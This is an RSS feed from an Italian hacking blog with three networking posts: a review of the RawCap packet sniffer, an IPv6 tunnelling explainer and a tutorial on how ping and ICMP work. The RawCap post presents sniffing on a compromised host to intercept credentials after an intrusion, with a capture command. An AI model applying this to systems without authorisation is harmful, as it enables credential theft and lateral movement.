<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>PillolHacking.Net &#187; Networking</title>
	<atom:link href="http://www.pillolhacking.net/category/networking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.pillolhacking.net</link>
	<description>Pillole di Informatica Non Convenzionale</description>
	<lastBuildDate>Tue, 31 Jan 2012 03:23:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>RawCap: Sniffer Tattico per Windows</title>
		<link>http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/</link>
		<comments>http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 03:30:46 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[sniffer]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1848</guid>
		<description><![CDATA[Durante un penetration test, una volta effettuata un’intrusione su di  una macchina target, può tornare utile sniffare il traffico in transito sulla macchina stessa per poter intercettare credenziali per poter elevare i privilegi o per accedere ad altri host più preziosi. Per svolgere questo compito ci vuole  uno sniffer. Esistono diversi potenti sniffer, commerciali e [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="rawcap" src="http://dl.dropbox.com/u/6342621/phstatic/rawcap.png" alt="" width="180" height="180" /></p>
<p>Durante  un penetration test, una volta effettuata un’intrusione su di  una  macchina target, può tornare utile sniffare il traffico in transito  sulla macchina stessa per poter intercettare credenziali per poter  elevare i privilegi o per accedere ad altri host più preziosi. Per  svolgere questo compito ci vuole  uno sniffer.</p>
<p>Esistono  diversi potenti sniffer, commerciali e gratuiti, che però in genere  necessitano di essere installati e necessitano pure driver aggiuntivi.  Un penetration tester, oppure chi abbia l’esigenza di effettuare  attività di incident response in condizioni critiche o difficili, ha  bisogno di uno strumento tattico, facile da dispiegare e da impiegare.</p>
<p><a href="http://www.netresec.com/?page=RawCap">RawCap</a> è un network sniffer free per Windows, ha dimensioni ridotte (17K) e  non necessita di installazione. Si tratta di un ideale tool tattico, da  utilizzare durante un penetration test o in un’attività di incident  response.</p>
<p>Tra i punti di forza:</p>
<ul>
<li>Può intercettare anche localhost (127.0.0.1)</li>
<li>Non necessita di DLL esterne e non è necessario installarlo</li>
<li>Può intercettare anche le interfacce Wifi e PPP</li>
<li>Impiega poca memoria</li>
<li>E’ semplice da usare</li>
</ul>
<p>La  semplicità è forse la caratteristica più evidente di RawCap. Per  iniziare ad intercettare traffico basta eseguire il programma  invocandolo da linea di comando e specificando l’indirizzo IP  dell’interfaccia da sottoporre a controllo e il file dove memorizzare i  pacchetti sniffati:<br />
<code><br />
RawCap.exe 192.168.13.37 dumpfile.pcap<br />
</code><br />
Una volta terminata la sessione sarà possibile decodificare il dump file con Wireshark. In  alternativa è possibile anche avviare il programma senza specificare  parametri; apparirà la lista numerata delle interfacce disponibili e  successivamente verrà chiesto il nome del file di dump. Tutto qui.</p>
<p>Ho  parlato degli aspetti positivi, ma naturalmente esistono anche i  contro. Intanto, è vero che non necessita DLL e installazione, ma è  anche vero che è basato su framework .NET2.0; certo,oggi dovrebbe essere  disponibile su praticamente tutti i Windows in circolazione, però è  corretto segnalarlo.</p>
<p>Altro  limite, a detta dell’autore stesso, è l’affidabilità: se funziona  perfettamente su XP, la stessa cosa non si può dire per Vista e Win7, a  causa della tecnica utilizzata dal programma per effettuare lo sniffing,  ovvero le raw socket, che nelle ultime versioni di Windows non  sarebbero affidabili come nelle versioni precedenti.</p>
<p>Tirando  le somme, RawCap è un ottimo strumento semplice e leggero (e gratuito)  da usare in condizioni difficili o critiche, meglio se su Windows XP.</p>
<p>RawCap può essere scaricato dal sito ufficiale:  <a href="http://www.netresec.com/?page=RawCap">http://www.netresec.com/</a></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Del.icio.us" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a digg" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technorati" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Google Bookmarks" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Segnalo" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a OKnotizie" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=RawCap%3A+Sniffer+Tattico+per+Windows&amp;url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Diggita" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;t=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FaceBook" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Upnews" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=RawCap%3A+Sniffer+Tattico+per+Windows&amp;url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a NotizieFlash" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Twitter" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=RawCap%3A+Sniffer+Tattico+per+Windows&amp;url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technotizie" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=RawCap%3A+Sniffer+Tattico+per+Windows&amp;url=http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FriendFeed" alt="Aggiungi 'RawCap: Sniffer Tattico per Windows' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2011/06/13/rawcap-sniffer-tattico-per-windows/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Rotta Verso IPv6</title>
		<link>http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/</link>
		<comments>http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/#comments</comments>
		<pubDate>Sun, 05 Jun 2011 21:26:52 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[freenet6]]></category>
		<category><![CDATA[ipv6]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1830</guid>
		<description><![CDATA[Ormai c’è un’apocalisse al giorno: catastrofi,terremoti,crisi,guerre. Forse è per questo motivo che è passato sottotono l’IPv4 Apocalypse. Di che cosa si tratta? In poche parole: gli indirizzi IPv4, ovvero gli indirizzi di Internet, stanno per esaurirsi; anzi, per la precisione sono già esauriti, dal Febbraio 2011. E’ un problema? Si e no. Può diventare un [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="ipv6" src="http://dl.dropbox.com/u/6342621/phstatic/ipv6.png" alt="" width="256" height="256" /></p>
<p>Ormai c’è un’apocalisse al giorno: catastrofi,terremoti,crisi,guerre. Forse è per questo motivo che è passato sottotono l’<a href="https://twitter.com/#%21/IPv4Countdown">IPv4 Apocalypse</a>.  Di che cosa si tratta? In poche parole: gli indirizzi IPv4, ovvero gli  indirizzi di Internet, stanno per esaurirsi; anzi, per la precisione  sono già esauriti, dal <a href="https://twitter.com/#%21/IPv4Countdown/status/33174459619737600">Febbraio 2011</a>.</p>
<p>E’  un problema? Si e no. Può diventare un problema se al più presto non  verranno prese delle contromisure, ovvero il passaggio al nuovo  protocollo IPv6, dotato di uno spazio di indirizzamento molto più vasto  dell’attuale, tale da mettere al riparo la rete da ulteriori esaurimenti  di indirizzi per un bel po’ di tempo.</p>
<p>Per  sensibilizzare imprese, enti ed utenti a prendere atto del problema,  l’Internet Society ha creato un grande evento mondiale, che si svolgerà  l’8 Giugno: <a href="http://www.worldipv6day.org/">Il Giorno Mondiale dell’IPv6</a>. Durante  questo evento, che può essere considerato come una prova generale per  il passaggio a IPv6, Google, Facebook, Akamai e molte altre grandi  entità mondiali offriranno i propri contenuti sul nuovo protocollo.</p>
<p>Come  passare al nuovo protocollo? In realtà tutti i sistemi operativi più  diffusi supportano questo nuovo standard (a dire il vero da parecchio  tempo). L’unico elemento che manca è il raccordo tra la rete IPv4 e la  nuova rete IPv6. Questo elemento è un <a href="http://www.pillolhacking.net/2011/02/17/come-creare-facilmente-un-tunnel-ssh-per-navigare-anonimi/">tunnel</a> che incapsula i pacchetti  IPv4, e li invia ad un gateway (il tunnel-broker) che si occupa di  instradare il traffico verso la nuova rete.</p>
<p>Tutto  questro sembra assai complesso, ma esistono servizi che offrono  l’accesso IPv6 senza particolari difficoltà.  Chi volesse provare il  brivido di navigare sul nuovo protocollo può usare <a href="http://gogonet.gogo6.com/page/freenet6-ipv6-services">Freenet6</a>.  Si tratta di un client che fornisce l’interfaccia necessaria per poter  inviare (in modo del tutto trasparente) il traffico di rete del proprio  computer verso la rete IPv6. Una volta scaricato e installato dovreste  essere in grado di raggiungere i servizi disponibili sul nuovo  protocollo, come <a href="http://ipv6.google.com/">ipv6.google.com</a>.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Rotta Verso IPv6' a Del.icio.us" alt="Aggiungi 'Rotta Verso IPv6' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Rotta Verso IPv6' a digg" alt="Aggiungi 'Rotta Verso IPv6' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Rotta Verso IPv6' a Technorati" alt="Aggiungi 'Rotta Verso IPv6' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Rotta Verso IPv6' a Google Bookmarks" alt="Aggiungi 'Rotta Verso IPv6' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Rotta Verso IPv6' a Segnalo" alt="Aggiungi 'Rotta Verso IPv6' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Rotta Verso IPv6' a OKnotizie" alt="Aggiungi 'Rotta Verso IPv6' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Rotta+Verso+IPv6&amp;url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Rotta Verso IPv6' a Diggita" alt="Aggiungi 'Rotta Verso IPv6' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;t=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Rotta Verso IPv6' a FaceBook" alt="Aggiungi 'Rotta Verso IPv6' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/&amp;title=Rotta+Verso+IPv6" title="Aggiungi 'Rotta Verso IPv6' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Rotta Verso IPv6' a Upnews" alt="Aggiungi 'Rotta Verso IPv6' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Rotta+Verso+IPv6&amp;url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Rotta Verso IPv6' a NotizieFlash" alt="Aggiungi 'Rotta Verso IPv6' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Rotta Verso IPv6' a Twitter" alt="Aggiungi 'Rotta Verso IPv6' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Rotta+Verso+IPv6&amp;url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Rotta Verso IPv6' a Technotizie" alt="Aggiungi 'Rotta Verso IPv6' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Rotta+Verso+IPv6&amp;url=http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/" title="Aggiungi 'Rotta Verso IPv6' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Rotta Verso IPv6' a FriendFeed" alt="Aggiungi 'Rotta Verso IPv6' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2011/06/05/rotta-verso-ipv6/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Come Funziona il Comando Ping?</title>
		<link>http://www.pillolhacking.net/2010/03/10/come-funziona-ping/</link>
		<comments>http://www.pillolhacking.net/2010/03/10/come-funziona-ping/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 04:00:55 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Analisi]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=1176</guid>
		<description><![CDATA[A chi non è capitato di usare almeno una volta il comando ping? Alla grande maggioranza suppongo, anche gli utenti meno smaliziati almeno una volta saranno stati costretti ad aprire l&#8217;odiato prompt dei comandi e digitare la parolina magica: ping. Ping è un programma diffuso praticamente su tutti i sistemi disponibili, si tratta di un&#8217;utility [...]]]></description>
			<content:encoded><![CDATA[<p>A chi non è capitato di usare almeno una volta il comando ping? Alla grande maggioranza suppongo, anche gli utenti meno smaliziati almeno una volta saranno stati costretti ad aprire l&#8217;odiato prompt dei comandi e digitare la parolina magica: ping.</p>
<p>Ping è un programma diffuso praticamente su tutti i sistemi disponibili, si tratta di un&#8217;utility di diagnostica che serve per misurare il tempo impiegato tra l&#8217;invio di un pacchetto dati e la ricezione della risposta dall&#8217;host remoto.</p>
<p>Il comando può essere utilizzato sia in LAN, sia in Internet, ma anche tra due computer collegati con un cavo di rete. E&#8217; utile per capire se due computer &#8220;si vedono&#8221;, ovvero possono dialogare scambiandosi dati.</p>
<p>In questo esempio mostro l&#8217;utilizzo di ping dal mio computer verso il router della mia rete, dove 192.168.1.1 è appunto l&#8217;indirizzo del router:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">C:\PillolHacking<span style="color: #33cc33;">&amp;</span>gt;ping 192.168.1.1
&nbsp;
Esecuzione di Ping 192.168.1.1 <span style="color: #0000ff; font-weight: bold;">con</span> 32 byte di dati:
&nbsp;
Risposta da 192.168.1.1: byte=32 durata=5ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=3ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=3ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=4ms TTL=64
&nbsp;
Statistiche Ping per 192.168.1.1:
Pacchetti: Trasmessi = 4, Ricevuti = 4, Persi = 0 <span style="color: #33cc33;">(</span>0<span style="color: #33cc33;">%</span> persi<span style="color: #33cc33;">)</span>,
Tempo approssimativo percorsi andata/ritorno <span style="color: #00b100; font-weight: bold;">in</span> millisecondi:
Minimo = 3ms, Massimo =  5ms, Medio =  3ms</pre></div></div>

<p>In un <a id="gig0" title="altro articolo" href="../2008/10/09/come-scoprire-il-sistema-operativo-remoto-con-un-solo-ping-e-un-pizzico-di-traceroute/">altro articolo</a> parlavo di come riuscire a capire, o perlomeno a tentare di indovinare il tipo di sistema operativo del computer remoto analizzando il campo TTL (in questo 64 ci suggerisce che il sistema operativo del router è basato sul kernel Linux).</p>
<p>Questa volta voglio soffermarmi su di un altro aspetto, anzi mi faccio una domanda:come funziona il ping, cosa succede dietro le quinte quando digito questo comando?</p>
<p>Il funzionamento di ping si basa sul protocollo <a id="oshv" title="ICMP (Internet Control Message Protocol)" href="http://it.wikipedia.org/wiki/ICMP">ICMP (Internet Control Message Protocol)</a>, un protocollo espressamente ideato per fornire servizi di diagnostica e controllo della rete. La struttura di questo protocollo è abbastanza semplice, infatti ICMP si compone di 4 campi:</p>
<p>1. Tipo<br />
2. Codice<br />
3. Checksum<br />
4. Dati</p>
<p>Particolarmente interessante è il campo Tipo. I tipi possono essere una trentina circa, ma quelli che ci interessano sono 2:</p>
<p>1. Tipo 0: Echo reply<br />
2. Tipo 8: Echo request</p>
<p>Quando digitiamo il comando ping, dopo aver fornito l&#8217;indirizzo Ip dell&#8217;host da controllare, avvengono le seguenti azioni:</p>
<p>1. Viene inviato un pacchtto dati ICMP di tipo 8 (Echo request) verso l&#8217;Ip specificato<br />
2. L&#8217;host remoto risponde con un paccheto ICMP di tipo 0 (Echo reply)</p>
<p style="text-align: left;">Ho catturato la sessione ping riportata sopra con <a id="f4_n" title="Wireshark" href="http://www.wireshark.org/">Wireshark</a>, qui sotto possiamo vedere lo scambio di pacchetti ICMP dall&#8217;host sorgente (il computer da cui ho impartito il comando) ovvero 192.168.1.6, e il router 192.168.1.1:</p>
<p style="text-align: center;"><a href="http://www.pillolhacking.net/wp-content/uploads/2010/03/ping1.png"><img class="aligncenter size-full wp-image-1169" title="ping1" src="http://www.pillolhacking.net/wp-content/uploads/2010/03/ping1.png" alt="" width="490" height="194" /></a></p>
<p>ecco la risposta da 192.168.1.1:</p>
<p style="text-align: center;"><a href="http://www.pillolhacking.net/wp-content/uploads/2010/03/ping2.png"><img class="aligncenter size-full wp-image-1179" title="ping2" src="http://www.pillolhacking.net/wp-content/uploads/2010/03/ping2.png" alt="" width="488" height="194" /></a></p>
<p>Queste immagini evidenziano la parte ICMP del pacchetto dati. La prima immagine mostra l&#8217;invio di Echo request  (notare il byte 22 impostato a 8), da 192.168.1.6 verso 192.168.1.1 (i dati relativi agli indirizzi sono inclusi nell&#8217;header Ip); La seconda mostra la risposta proveniente da 192.168.1.1, con Echo reply (si vede il byte 22 del segmento ICMP impostato a 0).</p>
<p>Analizzando i pacchetti si nota anche come Windows riempia con caratteri alfabetici (abcdefghjklmnopqrst&#8230;) il campo dati da 32 byte. Il pacchetto Echo reply si limita a ricopiare questi 32 byte e rispedirli al mittente.</p>
